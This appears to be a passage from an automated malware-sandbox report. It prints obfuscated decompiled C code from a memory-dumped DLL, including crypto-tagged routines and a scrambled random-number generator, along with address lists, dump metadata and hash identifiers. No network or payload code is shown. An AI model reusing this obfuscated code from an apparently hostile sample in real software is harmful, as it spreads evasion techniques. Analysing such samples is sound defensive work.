														 *(_t537[2] + _t574 * 4) = _t553;
														__eflags = _t553;
														if(_t553 != 0) {
															 *_t537 = _t574;
														}
														goto L30;
													} else {
														_t230 =  &(_t623[2]); // 0xc483ffff
														_v28 =  *_t230;
														_v32 = _v36[2];
														_t626 = 0;
														__eflags = 0;
														0;
														0;
														do {
															E6E4B6CC0(__eflags, _t626, _t536);
															 *((intOrPtr*)(_v32 + (_t626 + _t536) * 4)) =  *((intOrPtr*)(_v28 + _t626 * 4));
															_t626 = E6E4B6CC0(__eflags, _t626, 1);
															_t593 =  *_v52;
															_t435 = E6E4B3B00(_t626, _t593);
															_t536 = _v24;
															_t651 = _t651 + 0x18;
															__eflags = _t435 & 0x00000001;
														} while (__eflags != 0);
														goto L48;
													}
												} else {
													_v28 = _v36[2];
													_t212 =  &(_v52[2]); // 0xc483ffff
													_t511 =  *_t212;
													_t595 = 0;
													do {
														_t214 = _t595 - 0x5b01f7d8; // -1526855640
														_t442 = E6E4B6CC0(__eflags, _t214, _v24);
														_t443 = E6E4B8AE0(0x532f0d54);
														_t695 = _t688 + 0xc;
														_t445 =  *(_v28 + (_t443 + _t442) * 4);
														 *(_t511 + _t595 * 4) = _t445;
														__eflags = _t445;
														if(_t445 != 0) {
															_t221 = _t595 + 1; // 0x1
															 *_v52 = _t221;
														}
														_t413 = E6E4B2640(0, 1);
														_t688 = _t695 + 8;
														_t535 = _t595 - _t413;
														__eflags = _t595 - _v56;
														_t595 = _t595 - _t413;
													} while (__eflags != 0);
													goto L43;
												}
											}
											_t535 = _v40;
											_t558 = _v60;
											_t622 = _v52;
											_t592 = _v56;
											_t508 = _v20;
											goto L36;
											L30:
											_t367 = _v128 + 1;
											__eflags = _t367 - _v108;
											_t611 = _v56;
										} while (_t367 != _v108);
										goto L52;
									}
								}
								E6E4CCA10(_v88, _t546);
								_t610 = _v36;
								E6E4C6740(_t546, _t610, _v88);
								_t651 = _t651 + 0x10;
								goto L24;
							}
						}
						_t563 =  *_t306;
						_t514 = _t306;
						_t600 = _a4;
						__eflags =  *(_t600 + 4) - _t563;
						if( *(_t600 + 4) >= _t563) {
							_t468 = _t514;
							__eflags = _t563;
							if(_t563 <= 0) {
								L9:
								_t469 = _a8;
								L21:
								E6E4CCA10(_t469, 0);
								 *_t600 = 0;
								_t576 = _v40;
								_t489 = _v36;
								goto L58;
							}
							L18:
							_v48 = _t468[2];
							_v24 =  *((intOrPtr*)(_t520 + 8));
							_v44 =  *((intOrPtr*)(_t600 + 8));
							_t516 = 0;
							_t636 = 0;
							__eflags = 0;
							0;
							0;
							0;
							do {
								_v28 = _t563;
								_v20 = _t516;
								_t474 = E6E4B2640(_t563, 1);
								_t517 = _t474;
								_v32 = _t474;
								_t475 = E6E4B2DD0(0x82efaac, 0x7856dfe0);
								_t643 = _t643 + 0x10;
								_t549 = _t475;
								_t637 = _t636 << _t549;
								__eflags = _t549 & 0x00000020;
								_t603 =  !=  ? _t637 : (0 << 0x00000020 | _t636) << _t549;
								_t638 =  !=  ? 0 : _t637;
								_t640 = ( !=  ? 0 : _t637) ^  *(_v48 + _t517 * 4) | ( !=  ? 0 : _t637) &  *(_v48 + _t517 * 4);
								_t480 = E6E4C1B40(( !=  ? 0 : _t637) ^  *(_v48 + _t517 * 4) | ( !=  ? 0 : _t637) &  *(_v48 + _t517 * 4),  !=  ? _t637 : (0 << 0x00000020 | _t636) << _t549,  *_v24, 0);
								 *(_v44 + _t517 * 4) = _t480;
								__eflags = _t480;
								_t481 = _v20;
								_t519 =  ==  ? _t481 : _v28;
								__eflags = _t481;
								_t516 =  !=  ? _t481 :  ==  ? _t481 : _v28;
								_t636 = E6E4C9F80(( !=  ? 0 : _t637) ^  *(_v48 + _t517 * 4) | ( !=  ? 0 : _t637) &  *(_v48 + _t517 * 4),  !=  ? _t637 : (0 << 0x00000020 | _t636) << _t549,  *_v24, 0);
								_t563 = _v32;
								__eflags = _t563;
							} while (_t563 > 0);
							_t469 = _a8;
							_t600 = _a4;
							goto L21;
						}
						 *(_t600 + 4) = _t563;
						_t484 = E6E4CD3B0( *((intOrPtr*)(_t600 + 8)), _t563 << 2);
						_t520 = _a16;
						_t643 = _t643 + 8;
						 *((intOrPtr*)(_t600 + 8)) = _t484;
						_t468 = _t514;
						_t563 =  *_t514;
						__eflags = _t563;
						if(_t563 > 0) {
							goto L18;
						}
						goto L9;
					}
					 *_a4 = 0;
					E6E4CCA10(_a8, 0);
					L4:
					_t576 = _v40;
					goto L5;
				}
				 *_a4 = 0;
				E6E4BDAD0(_t565, _a8);
				goto L4;
			}



















































































































































    0x6e4ca000
    0x6e4ca009
    0x6e4ca011
    0x6e4ca019
    0x6e4ca020
    0x6e4ca028
    0x6e4ca030
    0x6e4ca038
    0x6e4ca03e
    0x6e4ca043
    0x6e4ca048
    0x6e4ca05f
    0x6e4ca064
    0x6e4ca067
    0x6e4ca069
    0x6e4ca0c5
    0x6e4ca0c7
    0x6e4ca0ca
    0x6e4ca0cc
    0x6e4ca0cf
    0x6e4ca0d2
    0x6e4ca0d5
    0x6e4ca119
    0x6e4ca11f
    0x6e4ca127
    0x6e4ca13b
    0x6e4ca149
    0x6e4ca14c
    0x6e4ca14f
    0x6e4ca15b
    0x6e4ca160
    0x6e4ca165
    0x6e4ca16b
    0x6e4ca16e
    0x6e4ca170
    0x6e4ca173
    0x6e4ca175
    0x6e4ca189
    0x6e4ca189
    0x6e4ca18f
    0x6e4ca194
    0x6e4ca197
    0x6e4ca197
    0x6e4ca19a
    0x6e4ca1a1
    0x6e4ca1a9
    0x6e4ca1b0
    0x6e4ca1bd
    0x6e4ca1c5
    0x6e4ca1e0
    0x6e4ca1e5
    0x6e4ca1ea
    0x6e4ca1ed
    0x6e4ca1f0
    0x6e4ca1f5
    0x6e4ca359
    0x00000000
    0x6e4ca1fb
    0x6e4ca1fb
    0x6e4ca1fb
    0x6e4ca1fd
    0x6e4ca202
    0x6e4ca20b
    0x6e4ca20f
    0x6e4ca210
    0x6e4ca214
    0x6e4ca219
    0x6e4ca222
    0x6e4ca22a
    0x6e4ca23f
    0x6e4ca244
    0x6e4ca247
    0x6e4ca24a
    0x6e4ca250
    0x6e4ca252
    0x6e4ca252
    0x6e4ca25a
    0x6e4ca25c
    0x6e4ca360
    0x6e4ca360
    0x6e4ca363
    0x6e4ca366
    0x6e4ca368
    0x6e4ca36a
    0x6e4ca36c
    0x6e4ca381
    0x6e4ca386
    0x6e4ca389
    0x6e4ca38c
    0x6e4ca38e
    0x6e4ca391
    0x6e4ca393
    0x6e4ca3a7
    0x6e4ca3ad
    0x6e4ca3b2
    0x6e4ca3b5
    0x6e4ca3b5
    0x6e4ca3be
    0x6e4ca3be
    0x6e4ca3c5
    0x6e4ca3c8
    0x6e4ca3ca
    0x6e4ca3cd
    0x6e4ca881
    0x6e4ca8a8
    0x6e4ca8ac
    0x6e4ca8b4
    0x6e4ca8b4
    0x6e4ca8c0
    0x6e4ca8cc
    0x6e4ca8d1
    0x6e4ca8d7
    0x6e4ca8d9
    0x6e4ca8dc
    0x6e4ca8de
    0x6e4ca8e0
    0x6e4ca9a6
    0x6e4ca9ad
    0x6e4ca9ad
    0x6e4ca9b3
    0x6e4ca9b9
    0x6e4ca9c1
    0x6e4ca9c4
    0x6e4ca9c4
    0x6e4ca084
    0x6e4ca084
    0x6e4ca087
    0x6e4ca08f
    0x6e4ca092
    0x6e4ca09a
    0x6e4ca09d
    0x6e4ca0a5
    0x6e4ca0a6
    0x6e4ca0ae
    0x6e4ca0af
    0x6e4ca0b7
    0x6e4ca0c4
    0x6e4ca0c4
    0x6e4ca8e9
    0x6e4ca8ec
    0x6e4ca8f3
    0x6e4ca8f3
    0x6e4ca8fb
    0x6e4ca8ff
    0x6e4ca900
    0x6e4ca903
    0x6e4ca90d
    0x6e4ca913
    0x6e4ca921
    0x6e4ca932
    0x6e4ca935
    0x6e4ca94c
    0x6e4ca95a
    0x6e4ca96a
    0x6e4ca96f
    0x6e4ca971
    0x6e4ca974
    0x6e4ca977
    0x6e4ca979
    0x6e4ca97c
    0x6e4ca97f
    0x6e4ca985
    0x6e4ca990
    0x6e4ca995
    0x6e4ca99a
    0x6e4ca99c
    0x6e4ca99c
    0x00000000
    0x6e4ca3d3
    0x6e4ca3d6
    0x6e4ca3dc
    0x6e4ca402
    0x6e4ca413
    0x6e4ca415
    0x6e4ca41f
    0x6e4ca42b
    0x6e4ca43c
    0x6e4ca45d
    0x6e4ca467
    0x6e4ca46c
    0x6e4ca46f
    0x6e4ca472
    0x6e4ca47a
    0x6e4ca490
    0x6e4ca490
    0x6e4ca4a4
    0x6e4ca4b2
    0x6e4ca4b7
    0x6e4ca4ba
    0x6e4ca4bd
    0x6e4ca4c5
    0x6e4ca4cd
    0x6e4ca4d0
    0x6e4ca4dd
    0x6e4ca4e0
    0x6e4ca4e4
    0x6e4ca4f5
    0x6e4ca502
    0x6e4ca50a
    0x6e4ca50d
    0x6e4ca513
    0x6e4ca516
    0x6e4ca51f
    0x6e4ca52e
    0x6e4ca530
    0x6e4ca544
    0x6e4ca548
    0x6e4ca54f
    0x6e4ca552
    0x6e4ca55a
    0x6e4ca564
    0x6e4ca56e
    0x6e4ca583
    0x6e4ca58f
    0x6e4ca592
    0x6e4ca59a
    0x6e4ca59a
    0x6e4ca5a1
    0x6e4ca5a3
    0x6e4ca5af
    0x6e4ca5ba
    0x6e4ca5bf
    0x6e4ca5cf
    0x6e4ca5d8
    0x6e4ca5dc
    0x6e4ca5e0
    0x6e4ca5e0
    0x6e4ca5e3
    0x6e4ca5e6
    0x6e4ca5e8
    0x6e4ca5f0
    0x6e4ca5f8
    0x6e4ca606
    0x6e4ca616
    0x6e4ca61d
    0x6e4ca627
    0x6e4ca634
    0x6e4ca63f
    0x6e4ca65c
    0x6e4ca661
    0x6e4ca664
    0x6e4ca667
    0x6e4ca66a
    0x00000000
    0x00000000
    0x6e4ca674
    0x6e4ca676
    0x6e4ca679
    0x6e4ca688
    0x6e4ca68b
    0x6e4ca690
    0x6e4ca697
    0x6e4ca69c
    0x6e4ca69f
    0x6e4ca6a1
    0x6e4ca6a4
    0x6e4ca6a6
    0x00000000
    0x00000000
    0x6e4ca6ac
    0x6e4ca6af
    0x6e4ca6b2
    0x6e4ca6b5
    0x6e4ca6b8
    0x6e4ca6cf
    0x6e4ca6cf
    0x6e4ca6d2
    0x6e4ca6d5
    0x6e4ca6d7
    0x6e4ca6da
    0x6e4ca6dd
    0x6e4ca6e5
    0x6e4ca6e8
    0x6e4ca6ef
    0x6e4ca6f4
    0x6e4ca6f7
    0x6e4ca6f7
    0x6e4ca6fa
    0x6e4ca6ff
    0x6e4ca705
    0x6e4ca708
    0x6e4ca70d
    0x6e4ca710
    0x6e4ca710
    0x6e4ca713
    0x6e4ca715
    0x6e4ca71b
    0x6e4ca790
    0x6e4ca793
    0x6e4ca797
    0x6e4ca79c
    0x6e4ca79f
    0x6e4ca7a1
    0x6e4ca7a7
    0x6e4ca7b4
    0x6e4ca7b9
    0x6e4ca7bc
    0x6e4ca7bc
    0x6e4ca7c3
    0x6e4ca7c8
    0x6e4ca7cb
    0x6e4ca7cd
    0x6e4ca7cf
    0x6e4ca7d2
    0x6e4ca82c
    0x6e4ca82c
    0x6e4ca82f
    0x6e4ca842
    0x6e4ca854
    0x6e4ca85b
    0x6e4ca860
    0x6e4ca860
    0x6e4ca863
    0x6e4ca869
    0x6e4ca86c
    0x6e4ca86f
    0x6e4ca872
    0x6e4ca874
    0x6e4ca87a
    0x6e4ca87a
    0x00000000
    0x6e4ca7d4
    0x6e4ca7d4
    0x6e4ca7d7
    0x6e4ca7e0
    0x6e4ca7e3
    0x6e4ca7e3
    0x6e4ca7eb
    0x6e4ca7ef
    0x6e4ca7f0
    0x6e4ca7fb
    0x6e4ca806
    0x6e4ca814
    0x6e4ca819
    0x6e4ca81d
    0x6e4ca822
    0x6e4ca825
    0x6e4ca828
    0x6e4ca828
    0x00000000
    0x6e4ca7f0
    0x6e4ca71d
    0x6e4ca723
    0x6e4ca729
    0x6e4ca729
    0x6e4ca72c
    0x6e4ca747
    0x6e4ca747
    0x6e4ca751
    0x6e4ca760
    0x6e4ca765
    0x6e4ca76d
    0x6e4ca770
    0x6e4ca773
    0x6e4ca775
    0x6e4ca777
    0x6e4ca77d
    0x6e4ca77d
    0x6e4ca734
    0x6e4ca739
    0x6e4ca73e
    0x6e4ca740
    0x6e4ca743
    0x6e4ca743
    0x00000000
    0x6e4ca747
    0x6e4ca71b
    0x6e4ca6c0
    0x6e4ca6c3
    0x6e4ca6c6
    0x6e4ca6c9
    0x6e4ca6cc
    0x00000000
    0x6e4ca480
    0x6e4ca483
    0x6e4ca484
    0x6e4ca487
    0x6e4ca487
    0x00000000
    0x6e4ca490
    0x6e4ca3cd
    0x6e4ca267
    0x6e4ca270
    0x6e4ca274
    0x6e4ca279
    0x00000000
    0x6e4ca279
    0x6e4ca1f5
    0x6e4ca0d7
    0x6e4ca0d9
    0x6e4ca0db
    0x6e4ca0de
    0x6e4ca0e1
    0x6e4ca281
    0x6e4ca283
    0x6e4ca285
    0x6e4ca10b
    0x6e4ca10f
    0x6e4ca342
    0x6e4ca344
    0x6e4ca34c
    0x6e4ca34e
    0x6e4ca351
    0x00000000
    0x6e4ca351
    0x6e4ca28b
    0x6e4ca28e
    0x6e4ca294
    0x6e4ca29a
    0x6e4ca29d
    0x6e4ca29f
    0x6e4ca29f
    0x6e4ca2a7
    0x6e4ca2ab
    0x6e4ca2af
    0x6e4ca2b0
    0x6e4ca2b0
    0x6e4ca2b3
    0x6e4ca2b9
    0x6e4ca2c1
    0x6e4ca2c3
    0x6e4ca2d0
    0x6e4ca2d5
    0x6e4ca2d8
    0x6e4ca2df
    0x6e4ca2e1
    0x6e4ca2e4
    0x6e4ca2ec
    0x6e4ca2fb
    0x6e4ca306
    0x6e4ca30e
    0x6e4ca311
    0x6e4ca313
    0x6e4ca319
    0x6e4ca31c
    0x6e4ca31e
    0x6e4ca32f
    0x6e4ca331
    0x6e4ca334
    0x6e4ca334
    0x6e4ca33c
    0x6e4ca33f
    0x00000000
    0x6e4ca33f
    0x6e4ca0e7
    0x6e4ca0f1
    0x6e4ca0f6
    0x6e4ca0f9
    0x6e4ca0fc
    0x6e4ca0ff
    0x6e4ca101
    0x6e4ca103
    0x6e4ca105
    0x00000000
    0x00000000
    0x00000000
    0x6e4ca105
    0x6e4ca06e
    0x6e4ca079
    0x6e4ca07e
    0x6e4ca081
    0x00000000
    0x6e4ca081
    0x6e4ca04d
    0x6e4ca057
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: N Ln
    • API String ID: 0-2483354276
    • Opcode ID: b8a54cfe708afbe71e637b34894f557089180e8760db2e229c64f1dcec228321
    • Instruction ID: 9363f0f49fb479c15831492a1bd9f852ab0095c888ea5dfc90bf245b61d9c56b
    • Opcode Fuzzy Hash: b8a54cfe708afbe71e637b34894f557089180e8760db2e229c64f1dcec228321
    • Instruction Fuzzy Hash: 68525DB9E002199FDB00CFF8DC45EAEB7B9EF48718F154529E815A7351E731AD018BA2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B68C0, Relevance: 1.4, Strings: 1, Instructions: 132COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 93%
    			E6E4B68C0(signed int _a4, signed int _a8, signed int _a12, char _a16) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t54;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t76;
				signed int _t79;
				signed int _t85;
				signed int _t87;
				signed int _t93;
				signed int _t95;
				signed int _t102;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t116;
				signed int _t118;
				signed int _t119;
				signed int _t121;
				signed int* _t123;

				_t123 = (_t121 & 0xfffffff8) - 0x20;
				_t1 =  &_a16; // 0x6e4c3526
				_t79 =  *_t1;
				_t119 = _a12;
				_t116 = _a8;
				_t118 = _a4;
				_t45 = _t118 - _t119;
				asm("sbb ecx, ebx");
				_v36 = _t116;
				_v40 = _t45;
				_t47 = _t45 + _t118 + _t119;
				_v44 = _t47;
				 *_t123 = _t47 + _t119;
				_t49 = _v40;
				_t85 =  *_t123 - _t49 ^ _t119;
				 *_t123 = _t85;
				_t87 = _t85 + _t119 ^ _t119;
				_v28 = _t87;
				_v44 = _t87 + _t49;
				if((_v36 ^ _t116 | _v40 ^ _t118) != 0 || (_t116 ^ _t79 | _t118 ^ _t119) != 0) {
					_t54 = (_v44 ^ _t118) + _t118;
					_v44 = _t54;
					_t93 = _t54 | _t119;
					 *_t123 = _t93;
					_t95 = _t93 * _t54 * _v40;
					_v28 = _t95;
					_v32 = _t95 + 0x2bb;
				}
				if( *0x6e4d508c == 0x82184f75 && ( *_t123 >> 0x0000001f ^ _t116 | _t118 ^  *_t123) != 0 && (_t79 ^ _t116 | _t119 ^ _t118) != 0) {
					_t73 = _v32 -  *_t123;
					_v28 = _t73;
					_v32 = _t73 + _t118;
					E6E4B5820(_v44, _t73 + _t118);
					_t116 = _a8;
					_t123 =  &(_t123[2]);
					_t76 = _v40;
					_t109 = _v32 & _t76;
					_v24 = _t109;
					_t110 = _t109 * _t76;
					_v28 = _t110;
					_t111 = _t110 & _t119;
					 *_t123 = _t111;
					_v44 = _t111 & _t119;
				}
				asm("sbb eax, ebx");
				if(_t118 >= _t119 && (_v36 ^ _t116 | _v40 ^ _t118) == 0 && (_t79 ^ _v36 | _t119 ^ _v40) == 0) {
					asm("sbb ecx, edx");
					if(_v24 >= _t118) {
						_t62 = _v44 - _v24;
						_v24 = _t62;
						_t63 = _t62 | _v40;
						_v44 = _t63;
						_t102 =  *_t123;
						_t64 = _t63 + _t102;
						 *_t123 = _t64;
						_v28 = _t102;
						_v32 = _t64 * _t102;
					}
				}
				 *0x6e4d50a4 = _v32;
				return _v40;
			}

































    0x6e4b68c9
    0x6e4b68cc
    0x6e4b68cc
    0x6e4b68cf
    0x6e4b68d2
    0x6e4b68d5
    0x6e4b68da
    0x6e4b68de
    0x6e4b68e0
    0x6e4b68e4
    0x6e4b68ea
    0x6e4b68ec
    0x6e4b68f2
    0x6e4b68f5
    0x6e4b68fe
    0x6e4b6900
    0x6e4b6905
    0x6e4b6907
    0x6e4b690d
    0x6e4b691f
    0x6e4b6933
    0x6e4b6935
    0x6e4b693b
    0x6e4b693d
    0x6e4b6943
    0x6e4b6948
    0x6e4b6952
    0x6e4b6952
    0x6e4b6960
    0x6e4b6982
    0x6e4b6985
    0x6e4b698b
    0x6e4b6994
    0x6e4b6999
    0x6e4b699c
    0x6e4b699f
    0x6e4b69a7
    0x6e4b69a9
    0x6e4b69ad
    0x6e4b69b0
    0x6e4b69b4
    0x6e4b69b6
    0x6e4b69bb
    0x6e4b69bb
    0x6e4b69c3
    0x6e4b69c5
    0x6e4b69ee
    0x6e4b69f0
    0x6e4b69f6
    0x6e4b69fa
    0x6e4b69fe
    0x6e4b6a02
    0x6e4b6a06
    0x6e4b6a09
    0x6e4b6a0b
    0x6e4b6a0e
    0x6e4b6a15
    0x6e4b6a15
    0x6e4b69f0
    0x6e4b6a1d
    0x6e4b6a31

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: &5Ln
    • API String ID: 0-1887126739
    • Opcode ID: 7f852410919c0e65c74cc31919f7e61b8d470932b8adf4d5283a0fb7dcdb3244
    • Instruction ID: 1d3f40a332c9ba3508ddeec99fd1b16060593923bc5bcf058af5c6ce675fe7b5
    • Opcode Fuzzy Hash: 7f852410919c0e65c74cc31919f7e61b8d470932b8adf4d5283a0fb7dcdb3244
    • Instruction Fuzzy Hash: 54410A717283029FCB48DF78D9A196EBBE5EBC8710F04882EA59AC7350D774D8448B92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4C88F0, Relevance: .4, Instructions: 429COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 96%
    			E6E4C88F0(void* __eflags) {
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr* _t67;
				intOrPtr _t68;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				signed int _t80;
				signed int _t84;
				signed int _t89;
				signed int _t92;
				unsigned int _t95;
				signed int _t99;
				signed int _t103;
				signed int _t104;
				signed int _t113;
				signed int _t117;
				signed int _t118;
				signed int _t125;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				signed int _t134;
				signed int _t137;
				void* _t138;
				signed int _t144;
				void* _t150;
				signed int _t151;
				signed int _t155;
				signed int _t160;
				signed int _t173;
				signed int _t182;
				signed int _t186;
				signed int _t192;
				signed int _t230;
				signed int _t234;
				signed int _t240;
				signed int _t261;
				signed int _t272;
				void* _t288;
				void* _t290;
				void* _t291;
				void* _t348;

				_t67 = E6E4CF5C0(0, E6E4B8AE0(0x8e82bd8));
				_t290 = _t288 + 0xc;
				_t68 =  *_t67();
				_t348 = _t68 -  *0x6e4d7a68; // 0x46a7b5
				if(_t348 != 0) {
					 *0x6e4d7a68 = _t68;
					E6E4CCAE0(_t348, _t68);
					_t290 = _t290 + 4;
				}
				_pop(_t286);
				_t291 = _t290 - 0x14;
				if( *0x6e4d70b0 >= 0x270) {
					_t261 = 0;
					_t103 = 0xfffffc74;
					do {
						_v28 = _t103;
						_t104 = E6E4B74F0(0, 0x80000000, 0xffffffff);
						E6E4B88A0(0,  *(_t103 + 0x6e4d6a7c), 0x80000000);
						_v36 = _t261 + 1;
						_v24 = E6E4BA420(0,  *(_v28 + 0x6e4d6a80) & 0x7ffffffe & (_t104 ^  *(_t103 + 0x6e4d6a7c)) &  *(_t103 + 0x6e4d6a7c),  *(_v28 + 0x6e4d6a80) & 0x7ffffffe ^ (_t104 ^  *(_t103 + 0x6e4d6a7c)) &  *(_t103 + 0x6e4d6a7c));
						E6E4BA420(0,  *(_v28 + 0x6e4d6a80) & 0x7ffffffe, (_t104 ^  *(_t103 + 0x6e4d6a7c)) &  *(_t103 + 0x6e4d6a7c));
						_v32 =  *((intOrPtr*)(0x6e4d70b0 + _v28));
						_v24 = _v24 >> 1;
						_t113 = E6E4B74F0(0, 1, 0xffffffff);
						E6E4B88A0(0,  *(_v28 + 0x6e4d6a80), 1);
						_t117 = E6E4B88A0(0, 0x9eb9c38f,  !( *(0x6e4d3a48 + ((_t113 ^  *(_v28 + 0x6e4d6a80)) &  *(_v28 + 0x6e4d6a80)) * 4)));
						_t118 = E6E4B88A0(0,  *(0x6e4d3a48 + ((_t113 ^  *(_v28 + 0x6e4d6a80)) &  *(_v28 + 0x6e4d6a80)) * 4), 0x61463c70);
						_v32 = E6E4B74F0(0, _t118 | _t117, E6E4B88A0(0, _v32, 0x61463c70) |  !_v32 & 0x9eb9c38f);
						_v40 = E6E4B88A0(0, E6E4B8AE0(0xd65d1f61),  !_t122);
						_t182 = _v24;
						_t125 = E6E4B74F0(0, _t182, 0xffffffff);
						_t126 = E6E4B8AE0(0xd65d1f61);
						_t261 = _v36;
						_t128 = E6E4BA420(0, _v40, _t122 & 0x218c1a12);
						E6E4B74F0(0, _v32, _v24);
						_t130 = _v28;
						_t291 = _t291 + 0x78;
						 *(_t130 + 0x6e4d6a7c) = _t128 ^ (_t182 & 0x218c1a12 | _t126 & _t125);
						_t103 = _t130 + 4;
						_t351 = _t103;
					} while (_t103 != 0);
					_t230 = 0xe3;
					do {
						_t272 = 0x6e4d66f0[_t230];
						_t186 = E6E4B74F0(_t351, _t272, 0x7fffffff) & _t272;
						_t26 = _t230 - 0x58c0e74; // -93064593
						_v24 = _t230;
						_t134 = E6E4B6CC0(_t351, E6E4B6CC0(_t351, _t26, 1), 0x58c0e74);
						_v36 = _t134;
						E6E4B6CC0(_t351, _t230, 1);
						_t234 =  !(E6E4B8AE0(0x77d10572) ^ 0x6e4d66f0[_t134]) & 0x6e4d66f0[_t134];
						_t137 = E6E4B88A0(_t351, _t234, _t186);
						_t138 = E6E4B8AE0(0xb972351b);
						E6E4B8AE0(0xf7d10591);
						_v28 =  *((intOrPtr*)(0x33c0a1c0 + (_v24 - _t138) * 4));
						_v32 = E6E4B88A0(_t351, 0xa0822408, E6E4B74F0(_t351,  *(0x6e4d3a48 + E6E4B88A0(_t351, 0x6e4d66f0[_t134] & 0x00000001, 0xffffffff) * 4), 0xffffffff));
						_t144 = E6E4B8AE0(0xa8acde84);
						0x6e4d66f0[_v24] = E6E4B74F0(_t351,  *(0x6e4d3a48 + E6E4B88A0(_t351, 0x6e4d66f0[_t134] & 0x00000001, 0xffffffff) * 4) & 0x5f7ddbf7 | _v32, E6E4BA420(_t351, _t144 &  !_v28, E6E4B88A0(_t351, _v28, 0x5f7ddbf7))) ^ (_t234 ^ _t186 | _t137) >> 0x00000001;
						_t150 = E6E4B8AE0(0x82ef8e3);
						_t291 = _t291 + 0x6c;
						_t230 = _v36;
					} while (_t230 != _t150);
					_t192 =  *0x6e4d66f0; // 0xe4d71c4f
					_t151 = E6E4B8AE0(0x77d10572);
					_t240 =  *0x6e4d6d20; // 0xf97954f3
					_t155 = E6E4B8AE0(0xbc5d8869);
					_t353 = (_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 0x00000001 & 0x4b8c8d1a |  !((_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 1) & 0xb47372e5;
					_t160 = E6E4B74F0((_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 0x00000001 & 0x4b8c8d1a |  !((_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 1) & 0xb47372e5, ( !_t240 &  *(0x6e4d3a48 + (_t192 & 0x00000001) * 4) |  !( *(0x6e4d3a48 + (_t192 & 0x00000001) * 4)) & _t240) & 0x4b8c8d1a | _t155 &  !( !_t240 &  *(0x6e4d3a48 + (_t192 & 0x00000001) * 4) |  !( *(0x6e4d3a48 + (_t192 & 0x00000001) * 4)) & _t240), (_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 0x00000001 & 0x4b8c8d1a |  !((_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 1) & 0xb47372e5);
					_t291 = _t291 + 0x10;
					 *0x6e4d70ac = _t160;
					 *0x6e4d70b0 = 0;
				}
				_t69 =  *0x6e4d70b0; // 0x1
				_t47 = _t69 + 1; // 0x2
				 *0x6e4d70b0 = _t47;
				_v24 = 0x6e4d66f0[_t69];
				_v28 = E6E4B74F0(_t353, 0x6e4d66f0[_t69] >> 0xb, 0xffffffff) & 0x4298b002;
				_v36 = E6E4B74F0(_t353, E6E4B8AE0(0x4ab64a8e), 0xffffffff);
				_t74 = E6E4B88A0(_t353, 0x6e4d66f0[_t69] >> 0xb, _t73);
				_t75 = E6E4B8AE0(0x4ab64a8e);
				_v24 = E6E4B88A0(_t353, ((E6E4B88A0(_t353, _v24, _v36) | _t75 &  !_v24) ^ (_t74 | _v28)) << 7, 0x9d2c5680);
				_t80 = E6E4B8AE0(0x360b6090);
				_v24 = E6E4B88A0(_t353, _v24, 0xc1da65e3);
				_t84 = E6E4B88A0(_t353,  !((E6E4B88A0(_t353, _v24, _v36) | _t75 &  !_v24) ^ (_t74 | _v28)), 0x3e259a1c);
				_t89 = E6E4B88A0(_t353, E6E4B74F0(_t353, E6E4BA420(_t353, _t80 &  !_t79, _v24), ((E6E4B88A0(_t353, _v24, _v36) | _t75 &  !_v24) ^ (_t74 | _v28)) & 0xc1da65e3 | _t84) << 0x0000000f ^ 0x1039ffff, E6E4B74F0(_t353, E6E4BA420(_t353, _t80 &  !_t79, _v24), ((E6E4B88A0(_t353, _v24, _v36) | _t75 &  !_v24) ^ (_t74 | _v28)) & 0xc1da65e3 | _t84) << 0xf);
				E6E4B8AE0(0xe7e8fa8c);
				_t92 = E6E4B88A0(_t353, E6E4B8AE0(0x2d1f8c36),  !_t89);
				_t95 = E6E4B74F0(_t353, E6E4B88A0(_t353, _t89, 0xdace8945) | _t92, _t86 & 0xdace8945 |  !_t86 & 0x253176ba);
				_v24 = _t95;
				_v28 = E6E4B8AE0(0x79befae2) &  !(_t95 >> 0x12);
				_t173 =  !(E6E4B8AE0(0x79befae2));
				_t99 = E6E4B8AE0(0x79befae2);
				return E6E4BA420(_t353, _v28, _t95 >> 0x00000012 & _t173) ^ (_t173 & _v24 | _t99 &  !_v24);
			}

















































    0x6e4c8903
    0x6e4c8908
    0x6e4c890b
    0x6e4c890d
    0x6e4c8913
    0x6e4c8915
